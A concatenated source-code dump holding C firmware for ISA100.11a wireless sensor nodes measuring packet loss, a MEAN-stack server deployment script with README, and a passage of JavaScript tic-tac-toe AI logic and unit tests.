/*while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);*/
pkt_record_done_signal=nrk_signal_create();
if(pkt_record_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ERROR: creating packet record signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
while(1) {
//printf("check %d",isa_rx_pkt_check());
nrk_gpio_set(NRK_DEBUG_3);
if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//local_rx_buf[PKT_DATA_START+length-1]='\0';
//printf("length is %d, rssi is %d.\n\r",length,rssi);
//printf( "node %c,%d\r\n",local_rx_buf[PKT_DATA_START+5],local_rx_buf[PKT_DATA_START+7]);
packet_measurement_better(local_rx_buf);
isa_rx_pkt_release();
//printf("\r\n");
}
//printf("send message %d\r\n",cnt);
if(isa_tx_pkt_check(MY_TX_SLOT)!=0){
//printf("Pending TX");
}
else{
sprintf( &tx_buf[PKT_DATA_START],"node %d,%c",MY_ID,cnt++);
//sprintf( &tx_buf[PKT_DATA_START],"3");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
}
//isa_rx_pkt_release();
nrk_gpio_clr(NRK_DEBUG_3);
isa_wait_until_rx_or_tx();
}
}
void Task2 ()
{
uint8_t len,i;
uint8_t zero_killer=0xaa;
slip_init (stdin, stdout, 0, 0);
wait_until_record_full(); //wait for first batch of packets
while (1) {
//nrk_led_set (ORANGE_LED);
//sprintf (slip_tx_buf, pkt_measure);
//if(sendFlag){
//printf("")
nrk_gpio_set(NRK_DEBUG_1);
//printf("CN:%d\r\n",send_node);
slip_tx_buf[0]=send_node+1;
for(uint8_t i=0;i<NUM_OF_TEST_SET;i++){
slip_tx_buf[i+1]=pkt_measure[send_node][i] ^ zero_killer; //get rid of '\0'
}
//slip_tx_buf[i]=0; // add '\0' at the end
len = strlen (slip_tx_buf);
//printf("%d\r\n",len);
slip_tx (slip_tx_buf, len);
sendFlag=0;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[send_node][i]=0;
}
printf("KO,%d\r\n",send_node);
//nrk_wait_until_next_period ();
nrk_gpio_clr(NRK_DEBUG_1);
//}
wait_until_record_full();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
TaskTwo.task = Task2;
nrk_task_set_stk( &TaskTwo, Stack2, NRK_APP_STACKSIZE);
TaskTwo.prio = 3;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 20;
TaskTwo.period.nano_secs = 0;
TaskTwo.cpu_reserve.secs = 0;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs = 100*NANOS_PER_MS;
nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
void packet_measurement_better(uint8_t * local_rx_buf)
{
uint8_t i,length;
uint8_t next_pkt_offset;
uint8_t temp;
if(local_rx_buf[PKT_DATA_START]=='n'){
current_node = local_rx_buf[PKT_DATA_START+5]-'0'; // node number
received_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7];
next_pkt_offset = received_pkt_index[current_node]-current_pkt_index[current_node]; // packet index difference
//printf("%d,%d\r\n",next_pkt_offset,current_node);
//if(next_pkt_offset!=1){
//printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
if(next_pkt_offset>=20){
printf("HUGE LOSS\r\n");
printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
}
//}
current_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7]; // update current pakcet index
pkt_cnt[current_node] += next_pkt_offset; // add the number of packet been measured
temp = current_pkt_index[current_node] % 8; // use 1 byte to record 8 packets
//printf("%d,%d,%d\r\n",temp,frame_cnt[0],pkt_cnt[0]);
if(pkt_cnt[current_node]>=8){
frame_cnt[current_node]+=pkt_cnt[current_node]/8;
pkt_cnt[current_node]=temp;
//printf("current frame cnt: %d\r\n", frame_cnt[current_node]);
}
if(frame_cnt[current_node]>=NUM_OF_TEST_SET){
/*for(i=0;i<NUM_OF_TEST_SET;i++){
printf("pkt: %x\r\n",pkt_measure[current_node][i]);
}*/
//printf("KO %d\r\n",current_node);
// reboot buffer for further test
frame_cnt[current_node]=0;
sendFlag=1;
send_node=current_node;
nrk_event_signal (pkt_record_done_signal);
nrk_spin_wait_us(3000);
/*for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[current_node][i]=0;
}*/
}
//printf("%d,%d,%d\r\n",temp,frame_cnt[0],pkt_cnt[0]);
pkt_measure[current_node][frame_cnt[current_node]] |= ((uint8_t) 1) << temp;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/backup/isa_with_join_process/final_project/recipient/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <nrk_events.h>
#define MAX_SLIP_BUF 48
uint8_t slip_rx_buf[MAX_SLIP_BUF];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
//#define MY_CHANNEL 19
//#define MY_TX_SLOT 2
//#define MY_RX_SLOT 2
#define MY_ID 2
#define MY_CLK_SRC_ID 1
NRK_STK Stack1[NRK_APP_STACKSIZE];
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
nrk_task_type TaskTwo;
void Task1(void);
void Task2(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t i;
uint8_t length;
uint8_t *local_rx_buf;
int8_t rssi;
uint8_t cnt;
uint8_t my_tx_slot[4];
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(GREEN_LED);
isa_init(ISA_RECIPIENT,MY_ID,MY_CLK_SRC_ID);
//isa_set_channel_pattern(1);
//isa_set_schedule(ISA_RECIPIENT,MY_CLK_SRC_ID);
//isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);
while(1) {
//printf("check %d",isa_rx_pkt_check());
/*if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//local_rx_buf[PKT_DATA_START+length-1]='\0';
//printf("length is %d, rssi is %d.\n\r",length,rssi);
for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%c",local_rx_buf[i]);
cnt++;
}*/
//printf("send message %d\r\n",cnt);
sprintf( &tx_buf[PKT_DATA_START],"recipient %c", cnt++);
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),my_tx_slot[0]);
//isa_rx_pkt_release();
isa_wait_until_rx_or_tx();
}
}
void Task2()
{ uint16_t cnt;
uint8_t len;
printf ("My node's address is %d\r\n", NODE_ADDR);
printf ("Task1 PID=%d\r\n", nrk_get_pid ());
cnt = 0;
slip_init (stdin, stdout, 0, 0);
while (1) {
//nrk_led_set (ORANGE_LED);
//printf("Start\n\r");
sprintf (slip_tx_buf, "Hello ALex");
len = strlen (slip_tx_buf);
slip_tx (slip_tx_buf, len);
nrk_wait_until_next_period ();
//nrk_led_clr (ORANGE_LED);
nrk_wait_until_next_period ();
cnt++;
//printf("End\n\r");
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 0;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
TaskTwo.task = Task2;
TaskTwo.Ptos = (void *) &Stack2[NRK_APP_STACKSIZE-1];
TaskTwo.Pbos = (void *) &Stack2[0];
TaskTwo.prio = 15;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 1;
TaskTwo.period.nano_secs = 500*NANOS_PER_MS;
TaskTwo.cpu_reserve.secs = 1;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs= 0;
//nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
|
7a42c524382734a4acd28ec73fc41fc548d263ea
|
[
"Markdown",
"C",
"Makefile"
] | 47
|
C
|
echiacchiarini/OpenISA
|
b0d49a6e02aa7cf064dff93fc1806598eb2165b7
|
f47f946b5917c614db22791029bbcfa66e7b165a
|
refs/heads/master
|
<file_sep>The serverInit.sh script has been created to be run on a debian like system
that runs bash shell scripts and requires the mongodb-org-3.4.list file to be
added to install MongoDB.
The purpose is to deploy a MEAN application as taught by Coding Dojo.
At this time, it only clones GitHub repos.
To use this script, once you have created an Ubuntu instance on your Amazon Web
Service, ssh into the instance and git clone this repository to your server.
cd mean_deployment
Edit the nginx.conf file. The {{ private-ip }} tag needs to be replaced with
your server private IP address.
(TODO: add an ifconfig call that can dynamically replace the {{ private-ip }})
./serverInit.sh to run this script and repond to requeses for GitHub user and
repo information.
If you are not familiar with configuring a server manually, I suggest you do
so before using the shell script in case you need to troubleshoot the
deployment, but the point of using the script is to avoid any issues.
If deployment does not complete as expected, check if your project cloned
properly from GitHub.
<file_sep>#!/bin/bash
echo "Please enter the target project name(github repo and file name):"
read PROJECT_NAME
echo "Please enter the github user name:"
read USER_NAME
# Clone MEAN project from github location to /var/www/{{ PROJECT_NAME }}
sudo git clone https://github.com/$USER_NAME/$PROJECT_NAME /var/www/$PROJECT_NAME
# Add the key and move a sources list into the apt directory to add access to
# the MongoDB repositories for Ubuntu.
sudo mv mongodb-org-3.4.list /etc/apt/sources.list.d/
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv <KEY>
# Update and install all needed applications.
sudo apt-get update
sudo apt-get install -y build-essential \
openssl \
libssl-dev \
pkg-config \
tmux \
htop \
tree \
nginx \
git \
npm \
mongodb-org \
# Clean npm cache
sudo npm cache clean -f
# Install n, project manager and bower globally
sudo npm install -g -y n pm2 bower
# And latest version of node
sudo n stable
echo"Installs complete. Moving on to configuration..."
# Move the nginx configuration file to the sites available/{{ PROJECT_NAME}}
# location
sudo mv nginx.conf /etc/nginx/sites-available/$PROJECT_NAME
# Move to the project file and install project dependencies
cd /var/www/$PROJECT_NAME
sudo npm install -y
sudo bower install --allow-root
# Remove nginx default site files.
sudo rm /etc/nginx/sites-available/default
sudo rm /etc/nginx/sites-enabled/default
# Create symlink to newly avaible project.
sudo ln -s /etc/nginx/sites-available/$PROJECT_NAME /etc/nginx/sites-enabled/$PROJECT_NAME
# Ensure mongod is started.
sudo service mongod start
# Move to the project directory and start the project.
cd /var/www/$PROJECT_NAME
pm2 start server.js
# Reload and restart nginx.
sudo service nginx reload && sudo service nginx restart
echo "Complete. Please check all components installed properly."
|
775f8ffab8ee6fc463be1ba27bbe0ebb5c982ac1
|
[
"Markdown",
"Shell"
] | 2
|
Markdown
|
globedasher/mean_deployment
|
311dcf973ad6847bf84f8f657e35bd7b1c334ef5
|
e91f68e1efcc03187e3390dfde87da6bb69ec467
|
refs/heads/master
|
<repo_name>tovarb/solucion-curricula-js<file_sep>/mi-primera-web/app.js
alert("Bienvenida al curso de JS")
|
cbcdbb34ee9e56500bfa1d61f9da1e458d5674f5
|
[
"JavaScript"
] | 1
|
JavaScript
|
tovarb/solucion-curricula-js
|
669117772c51f4b93e47780c45eb961ab485fb32
|
74d39cef3fc63e450503098ae10e2bbc4f70c6bd
|
refs/heads/master
|
<repo_name>vijaychopra/ProgrammingAssignment2<file_sep>/cachematrix.R
## makeCacheMatrix and cacheSolve functions are used together to find inverse of a matrix.
## makeCacheMatrix caches the value of the inverse of the matrix so that it can be looked up
## in the cache when we need it again instead of recomputing it.
makeCacheMatrix <- function(x = matrix()) {
## inverse is Cache variable which stores the value of the inverse
inverse <- NULL
## setmatrixfunction sets the cache variable with the matrix whose inverse has been already calculated
setmatrix <- function(y) {
x <<- y
inverse <<- NULL
}
## getmatrix function gets the matrix whose inverse needs to be calculated
getmatrix <- function() x
## setinverse function sets the cache variable with the inverse value for the matrix
setinverse <- function(inversematrix) inverse <<- inversematrix
## getinverse function returns the inverse value present in cache
getinverse <- function() inverse
list(setmatrix = setmatrix, getmatrix = getmatrix,
setinverse = setinverse, getinverse = getinverse)
}
## cacheSolve checks if the inverse of the matrix was already computed and is present in the
## cache before calculating it. If its already present, it uses the value from the cache. If
## not, it recalculates it.
cacheSolve <- function(x, ...) {
## Here is is being checked if the inverse had been already calculated
## If the inverse value is already present in cache, then the same is returned.
inverse <- x$getinverse()
if(!is.null(inverse)) {
message("getting cached data")
return(inverse)
}
data <- x$getmatrix()
## If the inverse value is not present in cache, then it is calculated.
inverse <- solve(data, ...)
x$setinverse(inverse)
inverse
}
|
664582714297a400c965b8421db658f67454ce0f
|
[
"R"
] | 1
|
R
|
vijaychopra/ProgrammingAssignment2
|
e00740cc1d00be1fb471e261677f0508cc12a773
|
f9686eeacaae93f9c142ec63f0960f664a111663
|
refs/heads/master
|
<repo_name>steviesovak/LIRI-Bot<file_sep>/keys.js
console.log('Keys is loaded');
var twitterKeys = {
consumer_key: 'jvoKd1Z25wNcIVc271qxvq0jO',
consumer_secret: '<KEY>',
access_token_key: '<KEY>',
access_token_secret: '<KEY>',
}
module.exports = twitterKeys;
exports.spotify = {
id: process.env.SPOTIFY_ID,
secret: process.env.SPOTIFY_SECRET
};
|
85c86c189d8f7da33882549c8fb2a839d1580273
|
[
"JavaScript"
] | 1
|
JavaScript
|
steviesovak/LIRI-Bot
|
e41cd40b2f73355dcd101a04e07808feeb595a9b
|
32bcb96096e4c14665ba49e230774c01b5fc9a3d
|
refs/heads/main
|
<file_sep>package com.example.demo.controllers;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.servlet.ModelAndView;
import com.example.demo.interfaces.StudentRepository;
import com.example.demo.models.Student;
@Controller
public class StudentViewController {
private final StudentRepository repo;
@Autowired
public StudentViewController(StudentRepository repo) {
super();
this.repo = repo;
}
@RequestMapping("/student")
public ModelAndView getStudents() {
ModelAndView mv = new ModelAndView("allStudents.jsp");
List<Student> students = repo.findAll();
mv.addObject("students", students);
return mv;
}
@RequestMapping("/studentDetail:id={studentId}")
public ModelAndView getStudent(@PathVariable int studentId) {
ModelAndView mv = new ModelAndView("viewStudent.jsp");
Student student = repo.findById(studentId).orElse(null);
mv.addObject("student", student);
return mv;
}
@RequestMapping("/newStudent")
public String newStudent() {
return "newStudent.jsp";
}
@RequestMapping("/addStudent")
public String addStudent(Student student) {
repo.save(student);
return "newStudent.jsp";
}
@RequestMapping("/editStudent:id={studentId}")
public ModelAndView editStudent(@PathVariable int studentId) {
ModelAndView mv = new ModelAndView("editStudent.jsp");
Student student = repo.findById(studentId).orElse(null);
mv.addObject("student", student);
return mv;
}
@RequestMapping("/updateStudent")
public String updateStudent(Student student) {
repo.save(student);
return "redirect:/student";
}
@RequestMapping("/deleteStudent:id={studentId}")
public String deleteStudent(@PathVariable int studentId) {
Student student = repo.getById(studentId);
repo.delete(student);
return "redirect:/student";
}
}
<file_sep>insert into student (student_id, first_name, last_name, email) values (1, 'amy', 'ou', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (2, 'ben', 'lan', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (3, 'calo', 'sun', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (4, 'deny', 'lee', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (5, 'sun', 'windy', '<EMAIL>');
insert into student (student_id, first_name, last_name, email) values (6, 'scott', 'neil', '<EMAIL>');<file_sep>package com.example.demo.controllers;
import java.util.List;
import java.util.Optional;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import com.example.demo.models.Student;
import com.example.demo.services.StudentService;
@RestController
public class StudentController {
private final StudentService service;
public StudentController(StudentService service) {
super();
this.service = service;
}
@GetMapping("/students")
public List<Student> getStudents(){
return service.getStudents();
}
@GetMapping("/students/{studentId}")
public Optional<Student> getStudent(@PathVariable int studentId) {
return service.getStudent(studentId);
}
@PostMapping("/students")
public Student addStudent(@RequestBody Student student) {
return service.addStudent(student);
}
@PutMapping("/students")
public Student updateStudent(@RequestBody Student student) {
return service.updateStudent(student);
}
@DeleteMapping("/students/{studentId}")
public String deleteStudent(@PathVariable int studentId) {
return service.deleteStudent(studentId);
}
}
<file_sep># Spring Boot MVC Demo
<ul>
<li>Demo for using Spring Boot MVC to build RESTful CRUD API and JSP Web Application</li>
<li>Use Student Model to demonstrate how to Create, Read, Update, and Delete Student Object</li>
<li>H2 database is used to store and access data</li>
</ul>
<hr />
<h3> Get all students (top:API, bottom:JSP) </h3>
<img src="./images/allStudents_postman.png">
<hr />
<img src="./images/allStudents_jsp.png">
<hr />
<h3> Get a student (top:API, bottom:JSP) </h3>
<img src="./images/viewStudent_postman.png">
<hr />
<img src="./images/viewStudent_jsp.png">
<hr />
<h3> Post new student (top:API, bottom:JSP) </h3>
<img src="./images/addStudent_postman.png">
<hr />
<img src="./images/addStudent_jsp.png">
<hr />
<h3> Update a student (top:API, bottom:JSP) </h3>
<img src="./images/editStudent_postman.png">
<hr />
<img src="./images/editStudent_jsp.png">
<hr />
<h3> Delete a student (top:API, bottom:JSP) </h3>
<img src="./images/deleteStudent_postman.png">
<hr />
<img src="./images/deleteStudent_jsp.png">
<file_sep>package com.example.demo.services;
import java.util.List;
import java.util.Optional;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import com.example.demo.interfaces.StudentRepository;
import com.example.demo.models.Student;
@Service
public class StudentService {
private final StudentRepository repo;
@Autowired
public StudentService(StudentRepository repo) {
super();
this.repo = repo;
}
public List<Student> getStudents(){
return repo.findAll();
}
public Optional<Student> getStudent(int studentId) {
return repo.findById(studentId);
}
public Student addStudent(Student student) {
repo.save(student);
return student;
}
public Student updateStudent(Student student) {
repo.save(student);
return student;
}
public String deleteStudent(int studentId) {
Student student = repo.getById(studentId);
repo.delete(student);
return "Successfully deleted student";
}
}
|
7f73a95fb7c0f80c27172f3647a89d9c717b70f9
|
[
"Markdown",
"Java",
"SQL"
] | 5
|
Java
|
AmyOuY/SpringBootMVCdemo
|
5dd86c95ffa51dc37b1f8e89b43fe8508158fa70
|
8309e2b97a41ca3da7277d6f8c5c3066c8b14641
|
refs/heads/master
|
<repo_name>szomolanyi/TicTacToe<file_sep>/README.md
TicTacToe game - FreeCodeCamp project.
<file_sep>/src/unit_test.js
/*jshint esversion:6*/
const ft = require("./func_tools.js");
function unit_test() {
test_analyse('analyse move 1 ... ', ft.analyseMove(0, [], 'x'), {'trinities': 0, 'pairs': 0});
test_analyse('analyse move 2 ... ', ft.analyseMove(0, [undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_analyse('analyse move 3 ... ', ft.analyseMove(0, [undefined, 'x', 'x'], 'x'), {'trinities': 1, 'pairs': 0});
test_analyse('analyse move 4 ... ', ft.analyseMove(1, ['x', undefined, 'x'], 'x'), {'trinities': 2, 'pairs': 0});
test_analyse('analyse move 5 ... ', ft.analyseMove(4, [undefined, 'x', undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 2});
test_analyse('analyse move 6 ... ', ft.analyseMove(0, [undefined, undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_analyse('analyse move 7 ... ', ft.analyseMove(7, ['x', 'o', undefined, undefined, 'o', undefined, undefined, undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_analyse('analyse move 7 ... ', ft.analyseMove(7, ['x', 'o', undefined, undefined, 'o', undefined, undefined, undefined, 'x'], 'x'), {'trinities': 0, 'pairs': 1});
test_rank('compareRanks 1 ... ', ft.compareRanks([0,1,2,9],[0,1,7]), 1);
/*test_cmp('find_trinity 3 ... ', ft.find_trinity([0,1], []), [2]);
test_cmp('find pairs 3 ... ', ft.find_pairs_for_position(ft.Position(4), [undefined,'x',undefined,'x'], 'x'),[[1,4],[3,4]]);
test_cmp('find pairs 9 ... ', ft.find_pairs_for_position(ft.Position(1), ['x', undefined, undefined, undefined, 'o', undefined, undefined, 'o', undefined], 'x'),
[[0,1]]);
console.log('to2d(0) ...', ft.cmp(ft.to2d(0), [0,0]), 0===ft.to1d(ft.to2d(0)));
console.log('to2d(1) ...', ft.cmp(ft.to2d(1), [1,0]), 1===ft.to1d(ft.to2d(1)));
console.log('to2d(2) ...', ft.cmp(ft.to2d(2), [2,0]), 2===ft.to1d(ft.to2d(2)));
console.log('to2d(3) ...', ft.cmp(ft.to2d(3), [0,1]), 3===ft.to1d(ft.to2d(3)));
console.log('to2d(4) ...', ft.cmp(ft.to2d(4), [1,1]), 4===ft.to1d(ft.to2d(4)));
console.log('to2d(5) ...', ft.cmp(ft.to2d(5), [2,1]), 5===ft.to1d(ft.to2d(5)));
console.log('to2d(6) ...', ft.cmp(ft.to2d(6), [0,2]), 6===ft.to1d(ft.to2d(6)));
console.log('to2d(7) ...', ft.cmp(ft.to2d(7), [1,2]), 7===ft.to1d(ft.to2d(7)));
console.log('to2d(8) ...', ft.cmp(ft.to2d(8), [2,2]), 8===ft.to1d(ft.to2d(8)));
console.log('test direction 1 ... ', ft.cmp(
ft.direction(ft.Position(5), ft.Position(7)),
[-1, 1])
);
console.log('test direction 2 ... ', ft.cmp(
ft.direction(ft.Position(7), ft.Position(5)),
[1, -1])
);
console.log('test direction 3 ... ', ft.cmp(
ft.direction(ft.Position(1), ft.Position(2)),
[1, 0])
);
console.log('test direction 4 ... ', ft.cmp(
ft.direction(ft.Position(1), ft.Position(4)),
[0, 1])
);
console.log('test direction 5 ... ', ft.cmp(
ft.direction(ft.Position(4), ft.Position(1)),
[0, -1])
);
console.log('test mv 1 ... ', ft.cmp(ft.mv([0,0], [1,0], []), [1,0]));
console.log('test mv 2 ... ', ft.cmp(ft.mv([0,0], [-1,0], []), undefined));
console.log('test mv 3 ... ', ft.cmp(ft.mv([0,1], [0,1], []), [0,2]));
console.log('test mv 4 ... ', ft.cmp(ft.mv([2,1], [-1,-1], []), [1,0]));
console.log('find_trinity 1 ... ', ft.cmp(ft.find_trinity([1,2], []), [0]));
console.log('find_trinity 2 ... ', ft.cmp(ft.find_trinity([1,2], ['x','x']), []));
console.log('find_trinity 4 ... ', ft.cmp(ft.find_trinity([0,4], []), [8]));
console.log('find_trinity 5 ... ', ft.cmp(ft.find_trinity([2,5], []), [8]));
console.log('find_trinity 6 ... ', ft.cmp(ft.find_trinity([0,3], []), [6]));
console.log('find_trinity 7 ... ', ft.cmp(ft.find_trinity([4,6], []), [2]));
console.log('find_trinity 8 ... ', ft.cmp(ft.find_trinity([1,5], []), []));
console.log('find pairs 1 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(4), [], 'x'), []));
console.log('find pairs 2 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(4), [undefined,'x'], 'x'), [[1,4]]));
console.log('find pairs 4 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(4), [undefined,'x',undefined,'x'], 'x'),[[1,4],[3,4]]));
console.log('find pairs 5 ... ', ft.cmp(ft.find_pairs_for_position(ft.Position(1), [], 'x'), []));
test_cmp('find pairs 7 ... ', ft.find_pairs_for_position(ft.Position(8), ['o', undefined, undefined, 'o', 'x', undefined, undefined, undefined, undefined], 'x'),
[]);
test_cmp('find pairs 8 ... ', ft.find_pairs_for_position(ft.Position(7), ['o', undefined, undefined, 'o', 'x', undefined, undefined, undefined, undefined], 'x'),
[[4,7]]);*/
}
function test_rank(text, res, expected) {
if (res === expected) {
console.log(text, true);
}
else {
console.log(text, false);
}
}
function test_analyse(text, res, expected) {
if (!res ) {
console.log(text, false, '; result=');
console.log(res);
return;
}
if (res.pairs === expected.pairs && res.trinities === expected.trinities)
console.log(text, true);
else {
console.log(text, false, '; result=');
console.log(res);
}
}
function test_cmp(text, rr, res) {
if (ft.cmp(rr, res)) {
console.log(text, true);
}
else {
console.log(text, false, '; result=');
console.log(rr);
}
}
module.exports = unit_test;
<file_sep>/src/func_tools.js
/*jshint esversion:6*/
const all_dirs = [
[0,-1], [1,-1], [1,0], [1,1], [0,1], [-1,1], [-1,0], [-1,-1]
];
const ft = {
Position: function(i) {
if (i<0 || i>8) return(undefined); //out of map
return {
index: i,
x: i%3,
y: Math.trunc(i/3),
mv: function(direction) {
let ynew = this.y+direction[1];
let xnew = this.x+direction[0];
if (xnew>=0 && xnew<3 && ynew>=0 && ynew<3)
return ft.Position(ynew*3+xnew);
else {
return undefined;
}
}
};
},
opponent: function(kind) {
if (kind === 'x') return 'o';
else return 'x';
},
reverse_direction: function(d) {
return [-1*d[0], -1*d[1]];
},
get_pos: function(position, move_map) {
if (!position) return undefined;
return move_map[position.index];
},
opos_dir: function(dir) {
return [dir[0]*-1, dir[1]*-1];
},
cmp: function(array1, array2) {
if (array1 === undefined && array2 === undefined) return true;
return (array1.length == array2.length) && array1.every(function(element, index) {
if (Array.isArray(element) && Array.isArray(array2[index])) return ft.cmp(element, array2[index]);
else return element === array2[index];
});
},
is_middle_side: function(pos) {
return (pos===1 || pos===3 || pos === 5 || pos === 7);
},
is_corner: function(pos) {
return (pos===0 || pos===2 || pos===6 || pos===8);
},
opposite_corner: function(pos) {
if (pos === 0) return 8;
if (pos === 2) return 6;
if (pos === 6) return 2;
if (pos === 8) return 0;
},
compareRanks(rank1, rank2) {
let rs1 = rank1.sort((a,b)=>a-b);
let rs2 = rank2.sort((a,b)=>a-b);
let i1 = rs1.length-1;
let i2 = rs2.length-1;
while (i1 >= 0 && i2 >=0) {
if (rs1[i1] > rs2[i2]) return 1;
if (rs1[i1] < rs2[i2]) return 2;
i1-=1;
i2-=1;
}
if (i1 === i2) return 0;
if (i1 > i2) return 1;
else return 2;
},
findTurn: function(player, move_map, level) {
if (!level) level=0;
/* turn_rank :
0 : random
1 : Empty side: The player plays in a middle square on any of the 4 sides.
2 : Empty corner: The player plays in a corner square.
3 : Opposite corner: If the opponent is in the corner, the player plays the opposite corner.
4 : Center: A player marks the center. (If it is the first move of the game, playing on a corner gives "O" more opportunities to make a mistake and may therefore be the better choice; however, it makes no difference between perfect players.)
5 : Blocking, Option 2: If there is a configuration where the opponent can fork, the player should block that fork.
6 : Blocking, Option 1: The player should create two in a row to force the opponent into defending, as long as it doesn't result in them creating a fork. For example, if "X" has a corner, "O" has the center, and "X" has the opposite corner as well, "O" must not play a corner in order to win. (Playing a corner in this scenario creates a fork for "X" to win.)
7 : Blocking an opponent's fork
8 : Fork: Create an opportunity where the player has two threats to win (two non-blocked lines of 2).
9 : Block: If the opponent has two in a row, the player must play the third themselves to block the opponent.
10 : Win: If the player has two in a row, they can place a third to get three in a row.
*/
let optimal_move = -1;
let best_ranks=[];
for (let i=0; i<9; i++) {
if (!move_map[i]) {
